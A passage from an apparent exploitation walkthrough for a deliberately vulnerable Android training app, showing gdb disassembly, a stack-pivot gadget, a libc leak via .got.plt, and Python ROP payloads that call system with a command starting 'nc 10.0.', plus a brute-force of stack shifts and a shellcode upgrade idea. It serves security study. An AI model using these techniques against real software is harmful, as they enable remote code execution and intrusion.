  3. Finally restore the old rsp and rbp. This would be necessary for a stealthy approach. Restoring rsp is only really important for calling system, because if rsp points into keyValue, which is located on the heap, system will allocate alot of memory from the heap as if it was a stack, therefore going out-of-bounds fast.

So, the gadget of choice is located at 0x39509a and is of the form:

gef➤  x/10i 0x730c03400000 + 0x39509a
    0x730c0379509a <art_quick_do_long_jump+106>:	pop    rdi
    0x730c0379509b <art_quick_do_long_jump+107>:	pop    rsi
    0x730c0379509c <art_quick_do_long_jump+108>:	pop    rbp
    0x730c0379509d <art_quick_do_long_jump+109>:	add    rsp,0x8
    0x730c037950a1 <art_quick_do_long_jump+113>:	pop    rbx
    0x730c037950a2 <art_quick_do_long_jump+114>:	pop    rdx
    0x730c037950a3 <art_quick_do_long_jump+115>:	pop    rcx
    0x730c037950a4 <art_quick_do_long_jump+116>:	pop    rax
    0x730c037950a5 <art_quick_do_long_jump+117>:	pop    rsp
    0x730c037950a6 <art_quick_do_long_jump+118>:	ret

We can use the debugger to figure out how many qwords we need to pop in order for the ret - instruction to return to keyValue:

gef➤  disassemble Java_com_damnvulnerableapp_vulnerable_modules_UseAfterFreeExecModule_storePair
    0x0000730b9d3c8b5c <+252>:	mov    rax,QWORD PTR [rbp-0x70]
    0x0000730b9d3c8b60 <+256>:	mov    rax,QWORD PTR [rax+0x100]
    0x0000730b9d3c8b67 <+263>:	mov    rdi,QWORD PTR [rbp-0x78]   <--- keyValue
    0x0000730b9d3c8b6b <+267>:	xor    ecx,ecx
    0x0000730b9d3c8b6d <+269>:	mov    DWORD PTR [rbp-0xac],ecx
    0x0000730b9d3c8b73 <+275>:	mov    esi,ecx
=>  0x0000730b9d3c8b75 <+277>:	call   rax      <--- execution condition
gef➤  x/1gx $rbp-0x78
    0x730b9afdf818:	0x0000730cb77bb950
gef➤  x/10gx $rsp
0x730b9afdf7e0:	0x00000000990de82b	0x0000730d778087d0
0x730b9afdf7f0:	0x0000730b9afdfb00	0x0000730d77808880
0x730b9afdf800:	0x0000730b9afdfd60	0x0000730ca77f2750
0x730b9afdf810:	0x000000d09afdf8b0	0x0000730cb77bb950  <--- this is keyValue
0x730b9afdf820:	0x0000730cb77bb950	0x0000730c0379509c

So when we run into call rax, we push an additional return address onto the stack. Therefore we need to pop 1 + 7 qwords from the stack before we can shift the stack into keyValue and hit ret. So we need rsp to be keyValue, then the stack “changes” to our controlled ROP - chain. Therefore we can make use the Execute condition to run the above gadget, which will then trigger execution of the gadgets located in keyValue.

Now we will try to leak a libc.so address into a global variable in libart.so. This allows us to compute the libc.so base address, which in turn allows us to call system (the holy grail)! To that end, we will try to find a libc.so address in libart.so. The .got.plt is the best place to start looking. As Android’s dynamic linker likes loading shared objects with BIND_NOW (which is probably motivated by RELRO), the .got.plt is already populated with the correct function addresses. This implies that the .got.plt entry of _exit contains the actual address of _exit in the libc.so. Computing the offset of _exit’s .got.plt entry yields 0xc1be50 (we could use any other function from libc.so; _exit was chosen arbitrarily).

Observe that we only need 6 qwords to leak system:

# Leak exit@libc into rax
payload += gadget_pop_rdi
payload += address_got_plt_exit
payload += gadget_mov_rax_deref_rdi

# Put system@libc into rax
payload += gadget_pop_rcx
payload += p64(offset__exit - offset_system) # --> offset__exit >= offset_system (just testing)
payload += gadget_sub_rax_rcx

After the above, rax will contain the address of system@libc. Setting up the command to execute can be done by writing to a writable memory area in libart.so (hope that this does not crash; otherwise choose another area until it works). Writing the command could look like this:

payload += gadget_pop_rdi
payload += address_writable_memory
payload += gadget_pop_rcx
payload += b'nc 10.0.'
payload += gadget_mov_deref_rdi_rcx

Finally, we want to call system@libc, whose address is stored in rax. The main problem here is that just calling system will most likely crash the app, because rsp still points into the heap. If system uses a lot of stack memory, this will eventually invalidate heap chunks or trigger anti - out - of - bounds security mechanisms. Therefore, we need to restore rsp s.t. it points into a sufficiently large memory area that is assumed to be used by “user - code”, i.e. e.g. the original stack. Observe that the leaked addresses contained a stack pointer. We can go ahead and write the address of system@libc into that address and then restore the stack with a pop rsp; ret:

# Write address of system@got.plt to stack address. rdi currently contains the command string!
payload += gadget_pop_rcx
payload += address_stack
payload += gadget_mov_deref_rcx_rax # <-- rax = system@libc

# Restore stack. This gadget implicitly calls system
payload += gadget_pop_rsp
payload += address_stack

This exploit is very specific to this module, but it uses a technique that shifts the stack into a user - controlled memory region s.t. successive ret - instructions result in execution of ROP - gadgets.

Coming back from UseAfterFreeExecModule

The technique used to exploit the UAF vulnerability in the UseAfterFreeExecModule might be applicable to libUseAfterFreeWriteModule aswell. General steps are:

  1. Setup a ROP - chain in readable/writeable memory area. In this case, this will be in a shared memory region somewhere is libart.so.
  2. Next, overwrite rsp to point to the above mentioned memory region. Then immediately return using ret.
  3. Enjoy the ROP - chain

It turns out that this does not work by itself. As we can only write one qword in each function call, we can either overwrite the return address to trigger execution of e.g. a gadget or set the stack pointer, but not both at once. Therefore, we need to do a little magic to make things work.

The key observation is that rbp is often used to restore rsp in function epilogues. This is precisely what happens in the caller of storePair! See the following assembly of storePair:

gef➤  disassemble Java_com_damnvulnerableapp_vulnerable_modules_UseAfterFreeWriteModule_storePair 
    0x0000730b9ed59abd <+205>:	mov    rcx,QWORD PTR [rbp-0x50]
    0x0000730b9ed59ac1 <+209>:	mov    rax,QWORD PTR [rbp-0x58]
    0x0000730b9ed59ac5 <+213>:	mov    rax,QWORD PTR [rax]
    0x0000730b9ed59ac8 <+216>:	mov    QWORD PTR [rax],rcx      <--- write - what - where condition
    0x0000730b9ed59acb <+219>:	mov    rdi,QWORD PTR [rbp-0x38]
    0x0000730b9ed59acf <+223>:	mov    rax,QWORD PTR [rdi]
    0x0000730b9ed59ad2 <+226>:	mov    rax,QWORD PTR [rax+0x600]
    0x0000730b9ed59ad9 <+233>:	mov    rsi,QWORD PTR [rbp-0x48]
    0x0000730b9ed59add <+237>:	mov    rdx,QWORD PTR [rbp-0x70]
    0x0000730b9ed59ae1 <+241>:	mov    ecx,0x2
    0x0000730b9ed59ae6 <+246>:	call   rax
    0x0000730b9ed59ae8 <+248>:	mov    rdi,QWORD PTR [rbp-0x60]
    0x0000730b9ed59aec <+252>:	call   0x730b9ed59b90 <free@plt>
    0x0000730b9ed59af1 <+257>:	mov    rax,QWORD PTR fs:0x28
    0x0000730b9ed59afa <+266>:	mov    rcx,QWORD PTR [rbp-0x8]
    0x0000730b9ed59afe <+270>:	cmp    rax,rcx
    0x0000730b9ed59b01 <+273>:	jne    0x730b9ed59b0d <Java_com_damnvulnerableapp_vulnerable_modules_UseAfterFreeWriteModule_storePair+285>
    0x0000730b9ed59b07 <+279>:	add    rsp,0x70
    0x0000730b9ed59b0b <+283>:	pop    rbp               <--- restore old rbp of calling function
    0x0000730b9ed59b0c <+284>:	ret    

It is clear that in between the Write - What - Where condition and the pop rbp - instruction there are no references to the stored old rbp of the calling function. Therefore, we can “safely” overwrite it. But why would we do this? Consider what happens after we return from storePair:

gef➤  x/35i 0x0000730c0379ffa9
    0x730c0379ffa9:	call   r11
    0x730c0379ffac:	mov    rdi,QWORD PTR gs:0xe0    <--- we return here
    0x730c0379ffb5:	mov    rsi,rax
    0x730c0379ffb8:	movq   rdx,xmm0
    0x730c0379ffbd:	call   0x730c03d62b00 <artInvokeInterfaceTrampolineWithAccessCheck+208>
    0x730c0379ffc2:	mov    rcx,QWORD PTR gs:0xa0
    0x730c0379ffcb:	test   rcx,rcx
    0x730c0379ffce:	jne    0x730c037a0034 <art_quick_read_barrier_mark_reg02+116>
    0x730c0379ffd0:	mov    rsp,rbp                  <--- how convenient!
    0x730c0379ffd3:	movq   xmm1,QWORD PTR [rsp+0x18]
    0x730c0379ffd9:	movq   xmm2,QWORD PTR [rsp+0x20]
    0x730c0379ffdf:	movq   xmm3,QWORD PTR [rsp+0x28]
    0x730c0379ffe5:	movq   xmm4,QWORD PTR [rsp+0x30]
    0x730c0379ffeb:	movq   xmm5,QWORD PTR [rsp+0x38]
    0x730c0379fff1:	movq   xmm6,QWORD PTR [rsp+0x40]
    0x730c0379fff7:	movq   xmm7,QWORD PTR [rsp+0x48]
    0x730c0379fffd:	movq   xmm12,QWORD PTR [rsp+0x50]
    0x730c037a0004:	movq   xmm13,QWORD PTR [rsp+0x58]
    0x730c037a000b:	movq   xmm14,QWORD PTR [rsp+0x60]
    0x730c037a0012:	movq   xmm15,QWORD PTR [rsp+0x68]
    0x730c037a0019:	add    rsp,0x70
    0x730c037a001d:	pop    rcx
    0x730c037a001e:	pop    rdx
    0x730c037a001f:	pop    rbx
    0x730c037a0020:	pop    rbp
    0x730c037a0021:	pop    rsi
    0x730c037a0022:	pop    r8
    0x730c037a0024:	pop    r9
    0x730c037a0026:	pop    r12
    0x730c037a0028:	pop    r13
    0x730c037a002a:	pop    r14
    0x730c037a002c:	pop    r15
    0x730c037a002e:	movq   xmm0,rax
    0x730c037a0033:	ret    

So if we were to pass the function call call 0x730c03d62b00 and rcx = 0, then we reach mov rsp, rbp, where rbp can be a value of our choice if we decide to overwrite the old rbp! After rsp has been set, we can see that we have a lot of references to rsp in order to restore the registers. So in addition to our ROP - chain, we need to ensure that there is a region of size 0x70 + 11 * 0x8 of accessible memory. The content of the accessible memory region can be anything, although we could use it to make an initial setup for the registers. Right after that region, we can place our ROP - chain, as rsp will point to rbp + 0x70 + 11 * 0x8 = rbp + 0xc8. Once we hit the ROP - chain, we can continue as usual in order to set up a command for system etc.

Once we want to call system we need to restore the stack in order to make segmentation faults etc. less likely (remember that rsp is currently pointing to some globally accessible memory region, e.g. .bss. We do not want our stack to be there forever!). To that end we write the address of system to the stack pointer that was leaked by lookupExamples, set rsp to that address and call pop rsp; ret:

# Up to this point, rsp still points into .bss! This will most likely crash the app while calling system! Thus try to reset rsp by abusing the stack pointer leak. We will set rsp to the leaked address, but before we will set the stack value at that leaked address to system@libc! Thus we can use a pop rsp; ret gadget.
# Write address of system@got.plt to stack address. rdi currently contains the command string!
payload += gadget_pop_rcx
payload += address_stack
payload += gadget_mov_deref_rcx_rax

# Restore stack
payload += gadget_pop_rsp
payload += address_stack

There is only one problem remaining, i.e. when monitoring the exploit with gdb, we can observe that the ROP - chain might execute perfectly fine. But if we try to run the exploit without any debugger attached, it most likely does not work (at least in my case). There may be multiple reasons for that, among which the most probable ones are:

  1. gdb shifts the stack, because it stores debug information or similar
  2. gdb prevents the app from using certain global variables s.t. overwriting them with gdb attached results in no error.

It turns out that the first hypothesis is most likely true! To that end, we can try to brute - force over a finite set of possible stack shifts like so:

address_old_rbp = p64(u64(leak[4]) - 0x240 + 0x8 * (rbp_shift))


  • leak[4] is the stack address leak
  • - 0x240 is the offset of the leaked stack address to the address of the old rbp when gdb is attached
  • + 0x8 * rbp_shift shift to try for this run of the exploit. As we are “missing” gdb, it is very probable that there is less data on the stack, thus we increment the stack address.

A big problem could be that both of the above reasons are true. Thus, minizing the ROP - chain we write into global memory can be very helpful to rule out the second reason as much as possible. E.g. we could use a ROP - chain that just calls sleep(42). Then brute - force over all shifts until the app blocks. The shift that caused a block (longer than usual execution times, i.e. it might not block for all 42 seconds, because other threads might try to use overwritten global variables, which probably crashes the app!) is most likely the shift we were looking for.


It has been a long journey to get to arbitrary code execution, but in the end it worked! We abused the fact that there are no bounds checks for rsp, which allowed for redirecting the stack into attacker - controlled memory regions. This again triggered the execution of a ROP - chain.

An upgrade to the above attack would be to use a single ROP - chain that triggers execution of mmap and stores the result in a writable memory region. Then, using the Write - What - Where condition, we could fill the new memory region with arbitrary shellcode. Finally, we can overwrite the return address to redirect control flow into the shellcode.